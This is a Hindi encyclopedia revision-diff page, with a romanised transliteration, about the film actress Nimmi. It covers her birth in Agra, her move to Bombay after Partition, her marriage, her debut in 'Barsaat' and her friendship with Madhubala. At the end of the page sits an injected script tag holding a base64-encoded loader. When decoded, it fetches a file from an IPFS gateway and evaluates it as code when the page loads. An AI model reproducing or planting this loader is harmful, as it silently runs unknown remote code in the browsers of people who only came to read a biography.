Difference between revisions of "निम्मी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
'''निम्मी''' (जन्म- [[18 फ़रवरी]], [[1933]], [[आगरा]], [[उत्तर प्रदेश]]) भारतीय [[हिन्दी]] फ़िल्मों की प्रसिद्ध अभिनेत्रियों में से एक रही हैं। उनका असली नाम 'नवाब बानू' था। बॉलीवुड की इस मासूम-सी खूबसूरत अभिनेत्री का [[राज कपूर]] ने फ़िल्मी दुनिया से परिचय करवाया था। हालांकि निम्‍मी की फ़िल्मी शुरुआत सहायक अभिनेत्री के तौर पर राज कपूर और [[नर्गिस]] अभिनीत फ़िल्म 'बरसात' ([[1949]]) से हुई थी। दिलचस्‍प बात तो यह भी है कि इस खूबसूरत अभिनेत्री पर राज कपूर की नज़र उस समय पड़ी, जब वे एक फ़िल्म की शूटिंग देख रही थीं। निम्मी अपनी समकालीन नायिकाओं [[मधुबाला]], [[नर्गिस]], [[नूतन]], [[मीना कुमारी]], [[सुरैया]] और गीता बाली के समान ही प्रतिभाशाली थीं।
+
'''निम्मी''' (जन्म- [[18 फ़रवरी]], [[1933]], [[आगरा]], [[उत्तर प्रदेश]]) भारतीय [[हिन्दी]] फ़िल्मों की प्रसिद्ध अभिनेत्रियों में से एक रही हैं। उनका असली नाम 'नवाब बानू' था। बॉलीवुड की इस मासूम-सी खूबसूरत अभिनेत्री का [[राज कपूर]] ने फ़िल्मी दुनिया से परिचय करवाया था। हालांकि निम्‍मी की फ़िल्मी शुरुआत सहायक अभिनेत्री के तौर पर राज कपूर और [[नर्गिस]] अभिनीत फ़िल्म 'बरसात' ([[1949]]) से हुई थी। दिलचस्‍प बात तो यह भी है कि इस खूबसूरत अभिनेत्री पर राज कपूर की नज़र उस समय पड़ी, जब वे एक फ़िल्म की शूटिंग देख रही थीं। निम्मी अपनी समकालीन नायिकाओं [[मधुबाला]], [[नर्गिस]], [[नूतन]], [[मीना कुमारी]], [[सुरैया]] और गीता बाली के समान ही प्रतिभाशाली थीं। निम्मी खूबसूरत आँखों वाली सम्मोहक अभिनेत्री मानी जाती हैं। फ़िल्म में उनकी भूमिका को कभी भी सहनायिका के रूप में नहीं लिया गया। उन पर बहुत-सी फ़िल्मों के यादगार गीत फ़िल्माए गए थे। निर्देशक के. आसिफ़ की फ़िल्म 'लव एंड गॉड' उनकी आखिरी फ़िल्म थी।
 
{{tocright}}
 
{{tocright}}
 
==जन्म==
 
==जन्म==
Line 5: Line 5:
 
====मुम्बई आगमन====
 
====मुम्बई आगमन====
 
सन [[1947]] में [[भारत]] और [[पाकिस्तान]] के विभाजन के बाद शरणार्थियों की भीड़ में निम्मी और उनकी दादी भी थीं। निम्मी अपनी दादी के साथ [[बम्बई]] (वर्तमान मुम्बई) आ गयीं, जहाँ उनकी मौसी ज्योति रहती थीं, जो की [[हिन्दी]] फ़िल्मों में काम करती थीं। अब बम्बई निम्मी का नया आशियाना था, जहाँ एक रिफ्यूजी लड़की इतिहास के पन्नों में अपना नाम दर्ज करवाने के लिए तैयार थी।
 
सन [[1947]] में [[भारत]] और [[पाकिस्तान]] के विभाजन के बाद शरणार्थियों की भीड़ में निम्मी और उनकी दादी भी थीं। निम्मी अपनी दादी के साथ [[बम्बई]] (वर्तमान मुम्बई) आ गयीं, जहाँ उनकी मौसी ज्योति रहती थीं, जो की [[हिन्दी]] फ़िल्मों में काम करती थीं। अब बम्बई निम्मी का नया आशियाना था, जहाँ एक रिफ्यूजी लड़की इतिहास के पन्नों में अपना नाम दर्ज करवाने के लिए तैयार थी।
 +
====विवाह====
 +
निम्मी कभी स्कूल नहीं गई थीं। इसलिए घर की पढ़ाई ने उन्हें [[उर्दू]] तक ही सीमित रखा। वैसे फ़िल्मों में काम करते समय उन्होंने [[अंग्रेज़ी]] जरूर सीखी थी, लेकिन वे बातचीत अपनी ही जुबान में करती थीं। एक दिन काम करते वक्त निम्मी की मुलाकात लेखक अली रजा से हुई। संवाद की रिहर्सल कराने के लिए अली रजा ने निम्मी की मदद की। बाद में अली रजा ने ही उनमें शायरी का शौक पैदा कर दिया। बाद में यह शायरी दोस्ती और प्यार में बदल गई तो निम्मी ने लेखक-पटकथाकार अली रजा से शादी कर ली।<ref>{{cite web |url=http://www.nayaindia.com/news/28043-%E0%A4%AB-%E0%A4%B2-%E0%A4%AE-%E0%A4%A6-%E0%A4%A8-%E0%A4%AF-%E0%A4%95-%E0%A4%AD-%E0%A4%B2-%E0%A4%AD-%E0%A4%B2-%E0%A4%B2%E0%A4%A1-%E0%A4%95-%E0%A4%A8-%E0%A4%AE-%E0%A4%AE.html |title=फ़िल्मी दुनिया की भोली-भाली लड़की निम्मी|accessmonthday=30 दिसम्बर|accessyear=2012|last= |first= |authorlink= |format= |publisher= |language=[[हिन्दी]]}}</ref>
 
==फ़िल्मी शुरुआत==
 
==फ़िल्मी शुरुआत==
 
सन [[1948]] में प्रसिद्ध फ़िल्म निर्माता-निर्देशक [[महबूब ख़ान]], सेंट्रल स्टूडियो बम्बई में अपनी फ़िल्म 'अंदाज़' की शूटिंग कर रहे थे। 'अंदाज़' में [[दिलीप कुमार]] और [[राज कपूर]] के साथ थीं [[नर्गिस]]। इन तीनों ने पहली और आखिरी बार एक साथ काम किया था। निम्मी भी यहाँ मौजूद थीं। वह अक्सर शूटिंग देखने आती थीं। यहीं उन्हें राज कपूर ने देखा। उन दिनों राज कपूर फ़िल्म 'बरसात' ([[1949]]) के लिए एक नए चेहरा तलाश रहे थे। 'अंदाज' के सेट पर निम्मी का शर्मीला व्यवहार देखने के बाद 'बरसात' में अभिनेता [[प्रेम नाथ]] के साथ निम्मी को ले लिया गया। 'बरसात' में निम्मी हृदयहीन शहरी प्रेम नाथ आदमी को प्यार करती है। निम्मी ने मासूम पहाड़ी गड़ेरिन की भूमिका निभाई थी।<ref>{{cite web |url= http://sanjogwalter.blogspot.in/2012/07/blog-post_5759.html|title=निम्मी|accessmonthday=30 दिसम्बर|accessyear=2012|last= |first= |authorlink= |format= |publisher= |language=[[हिन्दी]]}}</ref>
 
सन [[1948]] में प्रसिद्ध फ़िल्म निर्माता-निर्देशक [[महबूब ख़ान]], सेंट्रल स्टूडियो बम्बई में अपनी फ़िल्म 'अंदाज़' की शूटिंग कर रहे थे। 'अंदाज़' में [[दिलीप कुमार]] और [[राज कपूर]] के साथ थीं [[नर्गिस]]। इन तीनों ने पहली और आखिरी बार एक साथ काम किया था। निम्मी भी यहाँ मौजूद थीं। वह अक्सर शूटिंग देखने आती थीं। यहीं उन्हें राज कपूर ने देखा। उन दिनों राज कपूर फ़िल्म 'बरसात' ([[1949]]) के लिए एक नए चेहरा तलाश रहे थे। 'अंदाज' के सेट पर निम्मी का शर्मीला व्यवहार देखने के बाद 'बरसात' में अभिनेता [[प्रेम नाथ]] के साथ निम्मी को ले लिया गया। 'बरसात' में निम्मी हृदयहीन शहरी प्रेम नाथ आदमी को प्यार करती है। निम्मी ने मासूम पहाड़ी गड़ेरिन की भूमिका निभाई थी।<ref>{{cite web |url= http://sanjogwalter.blogspot.in/2012/07/blog-post_5759.html|title=निम्मी|accessmonthday=30 दिसम्बर|accessyear=2012|last= |first= |authorlink= |format= |publisher= |language=[[हिन्दी]]}}</ref>

Revision as of 13:38, 30 December 2012

nimmi (janm- 18 faravari, 1933, agara, uttar pradesh) bharatiy hindi filmoan ki prasiddh abhinetriyoan mean se ek rahi haian. unaka asali nam 'navab banoo' tha. b aaulivud ki is masoom-si khoobasoorat abhinetri ka raj kapoor ne filmi duniya se parichay karavaya tha. halaanki nimh‍mi ki filmi shuruat sahayak abhinetri ke taur par raj kapoor aur nargis abhinit film 'barasat' (1949) se huee thi. dilachash‍p bat to yah bhi hai ki is khoobasoorat abhinetri par raj kapoor ki nazar us samay p di, jab ve ek film ki shootiang dekh rahi thian. nimmi apani samakalin nayikaoan madhubala, nargis, nootan, mina kumari, suraiya aur gita bali ke saman hi pratibhashali thian. nimmi khoobasoorat aankhoan vali sammohak abhinetri mani jati haian. film mean unaki bhoomika ko kabhi bhi sahanayika ke roop mean nahian liya gaya. un par bahut-si filmoan ke yadagar git filmae ge the. nirdeshak ke. asif ki film 'lav eand g aaud' unaki akhiri film thi.

janm

abhinetri nimmi ka janm 18 faravari, 1933 ko agara mean hua tha. unaki maan ka nam vahidan tha, jo apane daur ki mashahoor gayika aur abhinetri thian. nimmi ke pita abdul hakim militri mean thekedar the. jab nimmi keval nau varsh ki thian, tab inaki maan ka svargavas ka ho gaya. unake pita ne nimmi ko aibatabad[1]rahane ke lie dadi ke pas bhej diya. nimmi ke pita svayan agara chho d kar merath a gaye.

mumbee agaman

san 1947 mean bharat aur pakistan ke vibhajan ke bad sharanarthiyoan ki bhi d mean nimmi aur unaki dadi bhi thian. nimmi apani dadi ke sath bambee (vartaman mumbee) a gayian, jahaan unaki mausi jyoti rahati thian, jo ki hindi filmoan mean kam karati thian. ab bambee nimmi ka naya ashiyana tha, jahaan ek riphyooji l daki itihas ke pannoan mean apana nam darj karavane ke lie taiyar thi.

vivah

nimmi kabhi skool nahian gee thian. isalie ghar ki padhaee ne unhean urdoo tak hi simit rakha. vaise filmoan mean kam karate samay unhoanne aangrezi jaroor sikhi thi, lekin ve batachit apani hi juban mean karati thian. ek din kam karate vakt nimmi ki mulakat lekhak ali raja se huee. sanvad ki riharsal karane ke lie ali raja ne nimmi ki madad ki. bad mean ali raja ne hi unamean shayari ka shauk paida kar diya. bad mean yah shayari dosti aur pyar mean badal gee to nimmi ne lekhak-patakathakar ali raja se shadi kar li.[2]

filmi shuruat

san 1948 mean prasiddh film nirmata-nirdeshak mahaboob khan, seantral stoodiyo bambee mean apani film 'aandaz' ki shootiang kar rahe the. 'aandaz' mean dilip kumar aur raj kapoor ke sath thian nargis. in tinoan ne pahali aur akhiri bar ek sath kam kiya tha. nimmi bhi yahaan maujood thian. vah aksar shootiang dekhane ati thian. yahian unhean raj kapoor ne dekha. un dinoan raj kapoor film 'barasat' (1949) ke lie ek ne chehara talash rahe the. 'aandaj' ke set par nimmi ka sharmila vyavahar dekhane ke bad 'barasat' mean abhineta prem nath ke sath nimmi ko le liya gaya. 'barasat' mean nimmi hridayahin shahari prem nath adami ko pyar karati hai. nimmi ne masoom paha di g derin ki bhoomika nibhaee thi.[3]

madhubala se dosti

mahaboob khan ke nirdeshan mean bani film 'amar' (1954) apane samay ki age ki film thi, jo sanbhavat isi karan kafi darshakoan ko pansad nahian ayi. lekin is film mean madhubala aur nimmi, in donoan abhinetriyoan ke kam ki sarahana huee. film mean madhubala ne mina kumari ki jagah par kam kiya tha. mina kumari ne film ki 15 dinoan tak shootiang karane ke bad mahaboob khan se manamutav ke karan film ko chho d diya tha. is karan madhubala tatha nimmi ko ek sath kam karane ka mauka mila. film 'amar' ke set par nimmi aur madhubala mean gahari dosti ho gayi thi. ve apane bhojan ke sath-sath mekap room aur apane anubhavoan ko bhi sheyar karati thian. donoan itani gahari dost ho gayi thian ki unake bich dilip kumar ko lekar bhi charchaean hone lagian, jo us film mean mukhy bhoomika mean the.[4]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. ab pakistan mean
  2. filmi duniya ki bholi-bhali l daki nimmi (hindi). . abhigaman tithi: 30 disambar, 2012.
  3. nimmi (hindi). . abhigaman tithi: 30 disambar, 2012.
  4. madhubala, dilip kumar (hindi). . abhigaman tithi: 30 disambar, 2012.

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>